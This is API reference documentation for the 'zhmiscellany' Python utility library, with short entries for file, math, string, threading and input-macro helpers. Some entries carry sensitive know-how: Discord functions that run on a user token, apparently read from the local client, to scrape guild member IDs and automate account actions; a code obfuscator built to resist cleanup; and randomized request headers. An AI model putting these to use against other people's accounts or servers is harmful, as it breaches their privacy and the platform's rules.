`zhmiscellany.discord.scrape_guild()`
---
`scrape_guild(guild_id, channel_id, user_token, use_cache=True, console=False)`
Scrapes the members of a guild, returning their user IDs.
example:
```py
import zhmiscellany
members = zhmiscellany.discord.scrape_guild(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
guild_id='1162030646424768562',
channel_id='1162031219471556629'
)
for member_id in members:
print(member_id)
```
#
`zhmiscellany.discord.send_type()`
---
`send_type(user_token, channel_id)`
Sends an API request to make it seem like the user is typing in the channel, for 10 seconds.
#
`zhmiscellany.discord.decode_user_id()`
---
`decode_user_id(user_token)`
Decodes any user token to its user id.
#
`zhmiscellany.discord.get_guilds()`
---
`get_guilds(user_token, use_cache=True)`
Gets info of all guilds the user is in.
#
`zhmiscellany.discord.get_dm_channels()`
---
`get_dm_channels(user_token, use_cache=True)`
Gets info on all DM channels the user has.
#
`zhmiscellany.discord.get_invite_info()`
---
`get_invite_info(user_token, invite_code, use_cache=True)`
Gets info on any invite code.
#
`zhmiscellany.discord.generate_server_invite()`
---
`generate_server_invite(user_token, channel_id)`
Generates a valid invite to any server the user is in.
#
`zhmiscellany.discord.get_approximate_member_count()`
---
`get_approximate_member_count(user_token, channel_id, use_cache=True)`
Gets an approximate member count for any server the user is in. For small servers the count is exact; only for very large servers might it be inaccurate.
#
`zhmiscellany.discord.id_to_timestamp()`
---
`id_to_timestamp(id)`
Converts a discord id to a unix timestamp.
#
`zhmiscellany.discord.timestamp_to_id()`
---
`timestamp_to_id(timestamp)`
Converts a unix timestamp to a discord id.
#
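For intuition, both conversions follow from the publicly documented Discord snowflake layout: the high bits of an id are a millisecond offset from the Discord epoch (2015-01-01 UTC). A minimal sketch of that math, illustrative only and not the library's actual implementation:

```py
# Discord snowflake <-> unix timestamp, sketched from the public
# snowflake layout; not zhmiscellany's own code.
DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00 UTC in ms

def id_to_timestamp(snowflake_id):
    # The top bits of a snowflake hold ms since the Discord epoch.
    return ((int(snowflake_id) >> 22) + DISCORD_EPOCH_MS) / 1000

def timestamp_to_id(unix_timestamp):
    # Inverse: shift the ms offset back into the high bits.
    return (int(unix_timestamp * 1000) - DISCORD_EPOCH_MS) << 22
```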
`zhmiscellany.discord.get_user_avatar_url()`
---
`get_user_avatar_url(user_token, user_id, use_cache=True)`
Gets a URL to the image someone is using as their avatar.
#
`zhmiscellany.dict`
---
`zhmiscellany.dict.print_dict()`
---
`zhmiscellany.dict.print_dict(ldict)`
Prints out a dict in a readable way.
#
---
`zhmiscellany.fileio`
---
`zhmiscellany.fileio.read_json_file()`
---
`zhmiscellany.fileio.read_json_file(file_path)`
Reads json data from a json file and returns it as a dict.
#
`zhmiscellany.fileio.write_json_file()`
---
`zhmiscellany.fileio.write_json_file(file_path, data)`
Writes a dict to a json file.
#
`zhmiscellany.fileio.create_folder()`
---
`zhmiscellany.fileio.create_folder(folder_name)`
Creates a folder.
#
`zhmiscellany.fileio.remove_folder()`
---
`zhmiscellany.fileio.remove_folder(folder_name)`
Removes a folder and all contents.
#
`zhmiscellany.fileio.base_name_no_ext()`
---
`zhmiscellany.fileio.base_name_no_ext(file_path)`
Get the name of a file without the ext.
#
`zhmiscellany.fileio.convert_name_to_filename()`
---
`zhmiscellany.fileio.convert_name_to_filename(name)`
Convert a URL like name to a file system like name.
#
`zhmiscellany.fileio.convert_filename_to_name()`
---
`zhmiscellany.fileio.convert_filename_to_name(filename)`
Convert a file system like name back to a URL like name.
#
`zhmiscellany.fileio.recursive_copy_files()`
---
`zhmiscellany.fileio.recursive_copy_files(source_dir, destination_dir, prints=False)`
Copy all the files from a source directory and into a destination directory.
#
`zhmiscellany.fileio.empty_directory()`
---
`zhmiscellany.fileio.empty_directory(directory_path)`
Delete all the files in a directory but not the directory itself.
#
`zhmiscellany.fileio.abs_listdir()`
---
`zhmiscellany.fileio.abs_listdir(path)`
List the files in a directory, returns absolute paths.
#
`zhmiscellany.fileio.delete_ends_with()`
---
`zhmiscellany.fileio.delete_ends_with(directory, string_endswith, avoid=[])`
Delete all the files in a directory that end with a string, optional list of what files to avoid.
#
`zhmiscellany.fileio.read_bytes_section()`
---
`zhmiscellany.fileio.read_bytes_section(file_path, section_start, section_end)`
Read a section of a file without reading the whole thing.
#
`zhmiscellany.fileio.copy_file_with_overwrite()`
---
`zhmiscellany.fileio.copy_file_with_overwrite(src, dst)`
Copies and overwrites a file.
#
`zhmiscellany.fileio.fast_dill_dumps()`
---
`zhmiscellany.fileio.fast_dill_dumps(object)`
Pickle is a lot faster than dill, so this function automatically determines which to use: if pickle can serialize the object it uses that for speed, else it simply falls back to dill.
#
`zhmiscellany.fileio.fast_dill_loads()`
---
`zhmiscellany.fileio.fast_dill_loads(data)`
Same idea as fast_dill_dumps but it loads instead of dumps.
#
`zhmiscellany.fileio.save_object_to_file()`
---
`zhmiscellany.fileio.save_object_to_file(object, file_name, compressed=False)`
Saves an object to a file, uses fast_dill_dumps.
#
`zhmiscellany.fileio.load_object_from_file()`
---
`zhmiscellany.fileio.load_object_from_file(file_name, compressed=False)`
Designed to be used along with save_object_to_file but loads instead of saves.
#
`zhmiscellany.fileio.pickle_and_encode()`
---
`zhmiscellany.fileio.pickle_and_encode(obj)`
Pickles an object with fast_dill_dumps, compresses it and encodes it to a URL-safe string.
#
`zhmiscellany.fileio.decode_and_unpickle()`
---
`zhmiscellany.fileio.decode_and_unpickle(encoded_str)`
Designed to be used with pickle_and_encode, simply does the opposite thing and returns an object.
#
`zhmiscellany.fileio.list_files_by_modified_time()`
---
`zhmiscellany.fileio.list_files_by_modified_time(directory)`
Lists the files in a directory ordered by modified time.
#
`zhmiscellany.fileio.get_script_path()`
---
`zhmiscellany.fileio.get_script_path()`
Gets the path to the current file, it also supports PyInstaller EXEs, in which case it will return the path to the EXE.
#
`zhmiscellany.fileio.chdir_to_script_dir()`
---
`zhmiscellany.fileio.chdir_to_script_dir()`
Changes the current working directory to whatever folder the script is in.
#
`zhmiscellany.fileio.cache()`
---
`zhmiscellany.fileio.cache(seed, function)`
Caches the result of a function based on a seed value. Stores and retrieves the cached result from a file.
#
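Seed-based caching of this kind boils down to "hash the seed to a file name, load it if present, else compute and store". A rough pure-Python sketch of that pattern; the directory name and hashing choice here are illustrative assumptions, not zhmiscellany's implementation:

```py
import hashlib
import os
import pickle
import tempfile

# Hypothetical cache directory for the demo, not the library's location.
CACHE_DIR = os.path.join(tempfile.gettempdir(), 'fn_cache_demo')

def cache(seed, function):
    # Hash the seed into a stable file name.
    os.makedirs(CACHE_DIR, exist_ok=True)
    key = hashlib.md5(repr(seed).encode()).hexdigest()
    path = os.path.join(CACHE_DIR, key + '.pkl')
    # Cache hit: load the stored result instead of recomputing.
    if os.path.exists(path):
        with open(path, 'rb') as f:
            return pickle.load(f)
    # Cache miss: compute, store, return.
    result = function()
    with open(path, 'wb') as f:
        pickle.dump(result, f)
    return result
```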
`zhmiscellany.fileio.load_all_cached()`
---
`zhmiscellany.fileio.load_all_cached()`
Loads all cached function results from the cache directory. Raises an exception if nothing is cached.
#
`zhmiscellany.fileio.list_files_recursive()`
---
`zhmiscellany.fileio.list_files_recursive(folder)`
Recursively lists all files in a folder while skipping symlinks and junctions.
#
`zhmiscellany.fileio.list_files_recursive_multiprocessed()`
---
`zhmiscellany.fileio.list_files_recursive_multiprocessed(dir_path, return_folders=False)`
Recursively lists all files in a folder using multiprocessing for efficiency. Optionally returns folder names as well.
#
`zhmiscellany.fileio.list_files_recursive_cache_optimised_multiprocessed()`
---
`zhmiscellany.fileio.list_files_recursive_cache_optimised_multiprocessed(dir_path, show_timings=False, cache_in_temp=True)`
Efficiently lists files recursively using a cache to improve performance. Uses multiprocessing and caching to minimize redundant filesystem access and maximise speed. In testing, it listed the C drive with 1M+ files in 2.0s.
#
`zhmiscellany.fileio.encode_safe_filename()`
---
`zhmiscellany.fileio.encode_safe_filename(s, max_length=16)`
Encodes a string into a short, URL-safe, and filename-safe string. Uses base64 encoding and falls back to an MD5 hash if the result is too long.
#
`zhmiscellany.fileio.save_chunk()`
---
`zhmiscellany.fileio.save_chunk(name, data)`
Saves arbitrary data into a chunk inside a folder defined by the name. Very handy for saving and reloading progress if aggregating large amounts of data.
#
`zhmiscellany.fileio.load_chunks()`
---
`zhmiscellany.fileio.load_chunks(name)`
Loads all the chunks as a list from the folder defined by the name.
#
`zhmiscellany.fileio.clear_chunks()`
---
`zhmiscellany.fileio.clear_chunks(name)`
Deletes all the chunks from the folder defined by the name.
#
`zhmiscellany.fileio.list_drives()`
---
`zhmiscellany.fileio.list_drives()`
Returns a list of all the valid accessible connected drives.
#
---
`zhmiscellany.image`
---
`zhmiscellany.image.image_diff()`
---
`zhmiscellany.image.image_diff(img1, img2)`
Quantify the difference between 2 images, returns a float, lower means less difference.
#
`zhmiscellany.image.Canvas()`
---
`zhmiscellany.image.Canvas(width, height, colour=(0, 0, 0, 255))`
Creates an RGBA image canvas for drawing shapes and text. Uses direct pixel manipulation for precise control.
#
`zhmiscellany.image.Canvas.draw_circle()`
---
`zhmiscellany.image.Canvas.draw_circle(xy, radius, colour)`
Draws a filled circle at the specified coordinates with the given radius and color.
#
`zhmiscellany.image.Canvas.draw_line()`
---
`zhmiscellany.image.Canvas.draw_line(xy, vector, colour)`
Draws a line from the starting point in the direction of the vector.
#
`zhmiscellany.image.Canvas.draw_rectangle()`
---
`zhmiscellany.image.Canvas.draw_rectangle(xy, width, height, colour)`
Draws a rectangle with alpha blending. Supports per-pixel color blending for smooth transparency effects.
#
`zhmiscellany.image.Canvas.draw_pixel()`
---
`zhmiscellany.image.Canvas.draw_pixel(xy, colour)`
Sets the color of a single pixel, ensuring it remains within canvas bounds.
#
`zhmiscellany.image.Canvas.annotate()`
---
`zhmiscellany.image.Canvas.annotate(pixel_xy, text, text_scale=1.0, line_thickness=1, ...)`
Draws text near a specified pixel with an optional connecting line and background. Supports auto-contrast for visibility.
#
`zhmiscellany.image.value_to_color()`
---
`zhmiscellany.image.value_to_color(value, low, high, use_black=True)`
Maps a value within a range to an RGB color gradient from purple to red. Optionally includes black at the low end.
#
`zhmiscellany.image.hilbert_curve()`
---
`zhmiscellany.image.hilbert_curve(size)`
Generates a Hilbert curve covering a square of given size, returning a list of coordinate tuples.
#
---
`zhmiscellany.list`
---
`zhmiscellany.list.subtract_lists()`
---
`zhmiscellany.list.subtract_lists(main_list, *other_lists)`
Subtract some lists from a main list.
#
`zhmiscellany.list.remove_duplicates_by_element()`
---
`zhmiscellany.list.remove_duplicates_by_element(tuple_list, element)`
Removes duplicates from a 2d list, judged by the given element index within the sublists.
#
`zhmiscellany.list.multi_split()`
---
`zhmiscellany.list.multi_split(string_list, splits)`
Splits a list of strings multiple times using a list of delimiters, applying each split sequentially.
#
`zhmiscellany.list.split_into_n_groups()`
---
`zhmiscellany.list.split_into_n_groups(lst, n)`
Splits a list into n sublists; e.g. n=3 splits [1, 2, 3, 4] into [[1], [2], [3, 4]]
#
`zhmiscellany.list.split_into_sublists()`
---
`zhmiscellany.list.split_into_sublists(lst, n)`
Splits a list into sublists of size n; e.g. n=3 splits [1, 2, 3, 4] into [[1, 2, 3], [4]]
#
`zhmiscellany.list.flatten()`
---
`zhmiscellany.list.flatten(an_iterable)`
Flattens a 2d iterable into a 1d list.
#
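The chunking and flattening helpers above can be sketched in a few lines of plain Python. These are illustrative re-implementations of the described behaviour, not zhmiscellany's own code:

```py
def split_into_sublists(lst, n):
    # Chunks of size n; the last chunk holds any remainder.
    return [lst[i:i + n] for i in range(0, len(lst), n)]

def flatten(an_iterable):
    # Collapse one level of nesting into a flat list.
    return [item for sub in an_iterable for item in sub]
```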
---
`zhmiscellany.math`
---
`zhmiscellany.math.calculate_eta()`
---
`zhmiscellany.math.calculate_eta(timestamps, total_timestamps)`
Calculates the ETA of an event by a list of timestamps and an expected total amount of timestamps.
#
`zhmiscellany.math.smart_percentage()`
---
`zhmiscellany.math.smart_percentage(things, total_things)`
Returns a percentage that is automatically rounded to an appropriate amount of decimal points.
#
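An ETA from a list of completion timestamps is just "remaining items divided by the observed rate". A minimal sketch in that spirit; the exact formula zhmiscellany uses may differ:

```py
def calculate_eta(timestamps, total_timestamps):
    # Not enough samples to estimate a rate yet.
    if len(timestamps) < 2:
        return None
    elapsed = timestamps[-1] - timestamps[0]
    rate = (len(timestamps) - 1) / elapsed  # items per second
    remaining = total_timestamps - len(timestamps)
    return remaining / rate  # seconds left
```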
`zhmiscellany.math.calculate_evenly_spaced_points()`
---
`zhmiscellany.math.calculate_evenly_spaced_points(duration, segments)`
Calculates some evenly spaced numbers out of a larger number, for instance (5, 3) would be [0, 2.5, 5].
#
`zhmiscellany.math.clamp()`
---
`zhmiscellany.math.clamp(value, minimum, maximum)`
Clamps a value between 2 other values, (5, 2, 4) would return 4.
#
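Both of the last two helpers are small enough to sketch directly; these illustrative versions match the worked examples in the descriptions (clamp(5, 2, 4) → 4, (5, 3) → [0, 2.5, 5]) but are not the library's implementation:

```py
def clamp(value, minimum, maximum):
    # Constrain value to the [minimum, maximum] range.
    return max(minimum, min(value, maximum))

def calculate_evenly_spaced_points(duration, segments):
    # `segments` points spread evenly across [0, duration].
    step = duration / (segments - 1)
    return [step * i for i in range(segments)]
```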
`zhmiscellany.math.generate_grid()`
---
`zhmiscellany.math.generate_grid(top_left, bottom_right, rows, cols, int_coords=True, row_major=True)`
Generates a grid of points between two coordinates with optional integer rounding and row-major ordering.
#
`zhmiscellany.math.generate_eased_points()`
---
`zhmiscellany.math.generate_eased_points(p1, p2, num_points)`
Generates interpolated points between two coordinates using an ease-in-out function for smooth transitions.
#
`zhmiscellany.math.generate_linear_points()`
---
`zhmiscellany.math.generate_linear_points(p1, p2, num_points)`
Generates interpolated points between two coordinates using linear spacing.
#
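Linear interpolation between two coordinates, as described, can be sketched like this (illustrative only; zhmiscellany's version may handle arguments differently):

```py
def generate_linear_points(p1, p2, num_points):
    # Evenly interpolate between two (x, y) points, endpoints included.
    (x1, y1), (x2, y2) = p1, p2
    if num_points == 1:
        return [(x1, y1)]
    points = []
    for i in range(num_points):
        t = i / (num_points - 1)  # 0.0 at p1, 1.0 at p2
        points.append((x1 + (x2 - x1) * t, y1 + (y2 - y1) * t))
    return points
```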
`zhmiscellany.math.round_to_min_digits()`
---
`zhmiscellany.math.round_to_min_digits(number, min_digits=3)`
Rounds a number while ensuring a minimum number of significant digits.
#
---
`zhmiscellany.misc`
---
`zhmiscellany.misc.die()`
---
`zhmiscellany.misc.die()`
Kills the entire program, even if run in a thread. Often useful.
#
`zhmiscellany.misc.get_actual_screen_resolution()`
---
`zhmiscellany.misc.get_actual_screen_resolution()`
Retrieves the actual screen resolution using the Windows API.
#
`zhmiscellany.misc.focus_window()`
---
`zhmiscellany.misc.focus_window(process_name, interval=0)`
Attempts to bring a window of the specified process into focus, with multiple fallback methods.
#
`zhmiscellany.misc.setup_console_window()`
---
`zhmiscellany.misc.setup_console_window(xy=(0, 0), wh=(400, 100), always_on_top=True)`
Configures the console window position, size, and always-on-top state.
#
`zhmiscellany.misc.show_progress()`
---
`zhmiscellany.misc.show_progress(things, total_things, extra_data="", smart_ratelimit=False, max_prints=1000)`
Displays a progress percentage, with optional smart rate limiting for large iterations.
#
`zhmiscellany.misc.every_nth()`
---
`zhmiscellany.misc.every_nth(number, n)`
Returns True if the number is a multiple of n.
#
`zhmiscellany.misc.smart_every_nth()`
---
`zhmiscellany.misc.smart_every_nth(number, n, total)`
Optimized variant of every_nth, ensuring final iteration is included.
#
`zhmiscellany.misc.calculate_eta()`
---
`zhmiscellany.misc.calculate_eta(timestamps, total_timestamps)`
Estimates time remaining based on timestamps and total expected entries.
#
`zhmiscellany.misc.decide()`
---
`zhmiscellany.misc.decide(options, text)`
Prompts user input constrained to predefined options.
#
`zhmiscellany.misc.import_module_from_path()`
---
`zhmiscellany.misc.import_module_from_path(path, module_name=None)`
Dynamically imports a Python module from a file path.
#
`zhmiscellany.misc.base62_hash()`
---
`zhmiscellany.misc.base62_hash(anything)`
Generates a base62 hash derived from the MD5 hash of the input.
#
`zhmiscellany.misc.md5_int_hash()`
---
`zhmiscellany.misc.md5_int_hash(anything)`
Generates an integer hash from the MD5 hash of the input.
#
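Both hashing helpers derive from an MD5 digest of the input. A hypothetical sketch of the idea (hashing the input's repr is an assumption here; the library may serialize differently):

```py
import hashlib

ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

def md5_int_hash(anything):
    # MD5 of the input's repr, read as one big integer.
    return int(hashlib.md5(repr(anything).encode()).hexdigest(), 16)

def base62_hash(anything):
    # Re-encode that integer in base62 for a compact string form.
    n = md5_int_hash(anything)
    digits = []
    while n:
        n, rem = divmod(n, 62)
        digits.append(ALPHABET[rem])
    return ''.join(reversed(digits)) or '0'
```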
`zhmiscellany.misc.high_precision_sleep()`
---
`zhmiscellany.misc.high_precision_sleep(duration)`
Performs precise sleeping using a busy-wait loop for high accuracy.
#
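A busy-wait sleep trades CPU for accuracy, since `time.sleep()` alone can overshoot by the OS scheduler quantum. A minimal sketch of the hybrid approach the description implies (the 2 ms spin window is an assumption for illustration):

```py
import time

def high_precision_sleep(duration):
    end = time.perf_counter() + duration
    # Sleep through most of the wait cheaply, leaving a short spin window.
    if duration > 0.002:
        time.sleep(duration - 0.002)
    # Busy-wait the remainder for high accuracy.
    while time.perf_counter() < end:
        pass
```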
`zhmiscellany.misc.is_admin()`
---
`zhmiscellany.misc.is_admin()`
Checks if the current process is running with administrator privileges.
#
`zhmiscellany.misc.die_on_key()`
---
`zhmiscellany.misc.die_on_key(key="f9", show_message=False)`
Monitors a specific key press to terminate the process. Runs as a background thread.
#
`zhmiscellany.misc.obfuscate_python()`
---
`zhmiscellany.misc.obfuscate_python(python_code_string, do_not_obfuscate_indent_block_comment="# DNO", remove_prints=True, remove_comments=True, add_lines=True, new_line_ratio=10)`
Obfuscates Python code by removing comments, removing prints, and adding specially crafted junk lines that are very difficult to strip back out. The functionality of the code is unaffected, but it is rendered effectively unreadable.
#
`zhmiscellany.misc.time_it()`
---
`zhmiscellany.misc.time_it(action=False, clock=0)`
Measures and prints execution time for a given code section, supporting named timers.
#
`zhmiscellany.misc.here()`
---
`zhmiscellany.misc.here(*args)`
Prints debugging information including variable names, values, file name, and line number.
#
`zhmiscellany.misc.line()`
---
`zhmiscellany.misc.line`
Alias for the here() function, providing debug output.
#
`zhmiscellany.misc.l()`
---
`zhmiscellany.misc.l`
Alias for the here() function, providing debug output.
#
`zhmiscellany.misc.wait_for_vsync()`
---
`zhmiscellany.misc.wait_for_vsync()`
Waits until the next frame is rendered by the Windows window manager; very handy.
#
---
`zhmiscellany.netio`
---
`zhmiscellany.netio.download_file()`
---
`zhmiscellany.netio.download_file(url, file_path, ext)`
Downloads a file from a URL to a file path, with the given extension.
#
`zhmiscellany.netio.resolve_file()`
---
`zhmiscellany.netio.resolve_file(url, destination_folder=".")`
Generates a safe file path for a downloaded file by extracting its name from a URL and ensuring the path length is within limits.
#
`zhmiscellany.netio.generate_headers()`
---
`zhmiscellany.netio.generate_headers(url)`
Creates randomized HTTP headers for a given URL, including Referer and Host fields.
#
`zhmiscellany.netio.is_internet()`
---
`zhmiscellany.netio.is_internet()`
True if there is a working internet connection.
#
---
`zhmiscellany.processing`
---
`zhmiscellany.processing.multiprocess()`
---
`zhmiscellany.processing.multiprocess(target, args=(), max_retries=0, disable_warning=False)`
Runs a single function in a separate process using Ray multiprocessing.
#
`zhmiscellany.processing.synchronous_class_multiprocess()`
---
`zhmiscellany.processing.synchronous_class_multiprocess(cls, *args, disable_warning=False, **kwargs)`
Creates a remote Ray actor instance for a class, allowing parallel execution of class methods.
#
`zhmiscellany.processing.start_daemon()`
---
`zhmiscellany.processing.start_daemon(**kwargs)`
Starts a new daemon thread with the given parameters.
#
`zhmiscellany.processing.batch_multiprocess_threaded()`
---
`zhmiscellany.processing.batch_multiprocess_threaded(targets_and_args, disable_warning=False, killable=False, daemon=False)`
Executes multiple functions in parallel using Ray multiprocessing, inside a thread so as to be non-blocking.
#
`zhmiscellany.processing.multiprocess_threaded()`
---
`zhmiscellany.processing.multiprocess_threaded(target, args=(), disable_warning=False, killable=False, daemon=False)`
Runs a single function in a separate process, inside a thread so that the call is non-blocking.
#
`zhmiscellany.processing.raw_multiprocess()`
---
`zhmiscellany.processing.raw_multiprocess(func, args=(), fileless=True)`
Runs a function in a separate Python subprocess, capturing output while handling serialization and deserialization.
#
`zhmiscellany.processing.raw_continuous_multiprocess()`
---
`zhmiscellany.processing.raw_continuous_multiprocess(input_class, args=(), fileless=True, cleanup_file=True)`
Runs a class with a continuous output method in a separate subprocess, yielding results as they are produced.
#
`zhmiscellany.processing.batch_multiprocess()`
---
`zhmiscellany.processing.batch_multiprocess(targets_and_args, max_retries=0, expect_crashes=False, disable_warning=False, flatten=False)`
Executes multiple functions in parallel using Ray multiprocessing, with optional retries, crash handling, and fast result list flattening.
#
`zhmiscellany.processing.batch_threading()`
---
`zhmiscellany.processing.batch_threading(targets, max_threads=None, show_errors=True)`
Takes a list of (function, argument) pairs, for instance `[(print_numbers_up_to, 8), (print_numbers_up_to, 11)]`, and runs them across threads.
It also returns each function's return value in a list.
#
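The behavior described above can be sketched with `concurrent.futures` from the standard library. This is a stand-in for illustration, not the library's implementation; `batch_threading_sketch` and `numbers_up_to` are hypothetical names.

```python
from concurrent.futures import ThreadPoolExecutor

def batch_threading_sketch(targets, max_threads=None):
    # Each entry is (function, args); a bare value is treated as one argument.
    def call(entry):
        func, args = entry
        if not isinstance(args, tuple):
            args = (args,)
        return func(*args)
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        # map() yields results in the same order as the targets list.
        return list(pool.map(call, targets))

def numbers_up_to(n):
    return list(range(n))

results = batch_threading_sketch([(numbers_up_to, 3), (numbers_up_to, 5)])
print(results)  # [[0, 1, 2], [0, 1, 2, 3, 4]]
```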
`zhmiscellany.processing.batch_threading_gen()`
---
`zhmiscellany.processing.batch_threading_gen(targets, max_threads=None, show_errors=True)`
A generator version of the above function that yields results instead of returning a list.
#
`zhmiscellany.processing.dedupe()`
---
`zhmiscellany.processing.dedupe(an_iterable)`
Very efficiently deduplicates an iterable such as a list and returns a list.
#
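An efficient order-preserving dedupe can be sketched in one line with the standard library; this is an equivalent illustration, not necessarily how the library implements it.

```python
def dedupe_sketch(an_iterable):
    # dict preserves insertion order (Python 3.7+), so this keeps the
    # first occurrence of each element in O(n); elements must be hashable.
    return list(dict.fromkeys(an_iterable))

print(dedupe_sketch([3, 1, 3, 2, 1]))  # [3, 1, 2]
```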
`zhmiscellany.processing.thread_join_return()`
---
`zhmiscellany.processing.thread_join_return()`
A regular thread, except that `.join()` returns whatever value the target function returned, so the result can be used directly.
#
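A thread whose `join()` hands back the target's return value can be sketched as a small `threading.Thread` subclass; `ReturnThread` is a hypothetical stand-in, not the library's class.

```python
import threading

class ReturnThread(threading.Thread):
    # Hypothetical stand-in: remembers the target's return value
    # and hands it back from join().
    def __init__(self, target, args=(), kwargs=None):
        super().__init__()
        self._t, self._a, self._k = target, args, kwargs or {}
        self._result = None

    def run(self):
        self._result = self._t(*self._a, **self._k)

    def join(self, timeout=None):
        super().join(timeout)
        return self._result

t = ReturnThread(target=sum, args=([1, 2, 3],))
t.start()
print(t.join())  # 6
```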
---
`zhmiscellany.string`
---
`zhmiscellany.string.convert_to_base62()`
---
`zhmiscellany.string.convert_to_base62(number)`
Converts an integer to base 62, using the digits plus all lowercase and uppercase letters as symbols.
#
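Base-62 conversion can be sketched with repeated `divmod`; the digit ordering below (digits, then uppercase, then lowercase) is an assumption, as the library's actual alphabet order is not documented here.

```python
import string

# Assumed digit order; the library's actual alphabet may differ.
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

def to_base62(number):
    # Repeated divmod by 62 yields digits least-significant first.
    if number == 0:
        return ALPHABET[0]
    digits = []
    while number:
        number, rem = divmod(number, 62)
        digits.append(ALPHABET[rem])
    return "".join(reversed(digits))

print(to_base62(62))  # '10' in base 62
```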
`zhmiscellany.string.get_universally_unique_string()`
---
`zhmiscellany.string.get_universally_unique_string()`
Returns a universally unique string, even when called in direct succession. Strings are derived from the current time rather than randomness, so no two can ever be identical.
#
`zhmiscellany.string.multi_replace()`
---
`zhmiscellany.string.multi_replace(string, replaces)`
Takes a string and a list of (old, new) tuples, e.g. `multi_replace(string, [(string1, string2)])`, and replaces each occurrence of the old substring with its new counterpart.
#
`zhmiscellany.string.timestamp_to_time()`
---
`zhmiscellany.string.timestamp_to_time(unix_timestamp)`
Takes a Unix timestamp and returns the corresponding time as a human-readable string.
#
`zhmiscellany.string.truncate_string()`
---
`zhmiscellany.string.truncate_string(input_string, max_length)`
Truncates a string to a certain length.
#
`zhmiscellany.string.concatenate_strings_to_length()`
---
`zhmiscellany.string.concatenate_strings_to_length(strings, limit)`
Takes a list of strings and adds them together until adding any more would exceed the limit, then returns the resulting string.
#
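The greedy accumulation described above can be sketched as follows; `concat_to_length` is an illustrative stand-in, not the library's implementation.

```python
def concat_to_length(strings, limit):
    # Greedily append strings until adding the next one would
    # push the total length past the limit.
    out, total = [], 0
    for s in strings:
        if total + len(s) > limit:
            break
        out.append(s)
        total += len(s)
    return "".join(out)

print(concat_to_length(["abc", "de", "fgh"], 6))  # 'abcde'
```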
`zhmiscellany.string.smart_round()`
---
`zhmiscellany.string.smart_round(number, decimals=0)`
Same as the built-in `round`, but strips any trailing `.0` from the result.
#
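Dropping the trailing `.0` can be sketched by returning an `int` when the rounded value is whole; this is an equivalent illustration, not necessarily the library's code.

```python
def smart_round_sketch(number, decimals=0):
    result = round(number, decimals)
    # Return an int when the rounded value is whole, dropping the '.0'.
    if isinstance(result, float) and result.is_integer():
        return int(result)
    return result

print(smart_round_sketch(3.14159, 2))  # 3.14
print(smart_round_sketch(4.0))        # 4, not 4.0
```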
`zhmiscellany.string.convert_bytes()`
---
`zhmiscellany.string.convert_bytes(size)`
Converts an int of bytes to a string like '8.3MB'.
#
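A human-readable byte formatter matching the `'8.3MB'` example can be sketched like this; the 1024 divisor is an assumption (the library may use 1000).

```python
def convert_bytes_sketch(size):
    # Walk up the unit ladder, dividing by 1024 at each step
    # (the library may use 1000 instead -- this is an assumption).
    for unit in ("B", "KB", "MB", "GB", "TB"):
        if size < 1024 or unit == "TB":
            return f"{size}B" if unit == "B" else f"{size:.1f}{unit}"
        size /= 1024

print(convert_bytes_sketch(8_700_000))  # '8.3MB'
```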
`zhmiscellany.string.decide()`
---
`zhmiscellany.string.decide(options, text)`
Takes a list of options and a description text and makes the user decide between the options.
#
`zhmiscellany.string.filter_chars()`
---
`zhmiscellany.string.filter_chars(input_string, filter_string)`
Removes from `input_string` every character that appears in `filter_string`.
#
`zhmiscellany.string.multi_split()`
---
`zhmiscellany.string.multi_split(string, splits)`
`.split`s a string multiple times based on a list of strings to split by.
#
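Splitting on several separators at once can be sketched with one `re.split` over an escaped alternation; `multi_split_sketch` is an illustrative stand-in, not the library's implementation.

```python
import re

def multi_split_sketch(string, splits):
    # Escape each separator and split on any of them in one pass.
    pattern = "|".join(re.escape(s) for s in splits)
    return re.split(pattern, string)

print(multi_split_sketch("a,b;c|d", [",", ";", "|"]))  # ['a', 'b', 'c', 'd']
```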
---
`zhmiscellany.macro`
---
`zhmiscellany.macro.click_pixel()`
---
`zhmiscellany.macro.click_pixel(x=None, y=None, click_duration=None, right_click=False, middle_click=False, shift=False, ctrl=False, act_start=True, act_end=True, click_end_duration=None, double_click=False, animation_time=None, animation_fps=60, animation_easing=True, relative=False, ensure_movement=True, pre_click_duration=None, pre_click_wiggle=False)`
Simulates a mouse click at a given position using the raw SendInput method for better compatibility across applications. Supports right and middle clicks, modifier keys, and smooth animated movement with easing.
#
`zhmiscellany.macro.press_key()`
---
`zhmiscellany.macro.press_key(vk_code, shift=False, act_start=True, act_end=True, key_hold_time=0)`
Simulates a key press using the raw SendInput method. Supports holding shift and specifying key hold duration.
#
`zhmiscellany.macro.type_string()`
---
`zhmiscellany.macro.type_string(text=None, delay=None, key_hold_time=None, vk_codes=None, combine=False)`
Types a string or virtual key codes using the raw SendInput method. Supports per-character delays, key holding, and combined key presses.
#
`zhmiscellany.macro.scroll()`
---
`zhmiscellany.macro.scroll(amount, delay=None)`
Performs vertical scrolling using the raw SendInput method. Supports smooth scrolling with delay control.
#
`zhmiscellany.macro.get_mouse_xy()`
---
`zhmiscellany.macro.get_mouse_xy()`
Retrieves the current mouse cursor position.
#
`zhmiscellany.macro.KEY_CODES()`
---
`zhmiscellany.macro.KEY_CODES`
Dictionary mapping key names to their virtual key codes for use with press_key and type_string.
#
`zhmiscellany.macro.toggle_function()`
---
`zhmiscellany.macro.toggle_function(func, key='f8', blocking=True)`
Takes a function (for example, a small looping keyboard macro for a game) and binds it to a toggle key. Pressing the key (f8 by default) starts the macro looping, and pressing it again instantly stops the macro until it is toggled back on.
#
`zhmiscellany.macro.better_wait_for()`
---
`zhmiscellany.macro.better_wait_for(key)`
keyboard.wait() requires a clean press of the specified key, and concurrent key states can interfere with this interpretation. This function waits for a debounced press of the specified key, *ignoring concurrent modifier keys*, then unblocks execution.
#
`zhmiscellany.macro.record_actions_to_code()`
---
`zhmiscellany.macro.record_actions_to_code(RECORD_MOUSE_MOVEMENT=False, STOP_KEY='f9')`
Records keyboard and mouse events and generates zhmiscellany.macro code to replay them.
#
`zhmiscellany.macro.is_key_pressed_async()`
---
`zhmiscellany.macro.is_key_pressed_async(vk_code)`
Returns whether the key with the given virtual key code is currently pressed, without blocking.
#
`zhmiscellany.macro.press_key_directinput()`
---
`zhmiscellany.macro.press_key_directinput(key, shift=False, act_start=True, act_end=True, key_hold_time=0)`
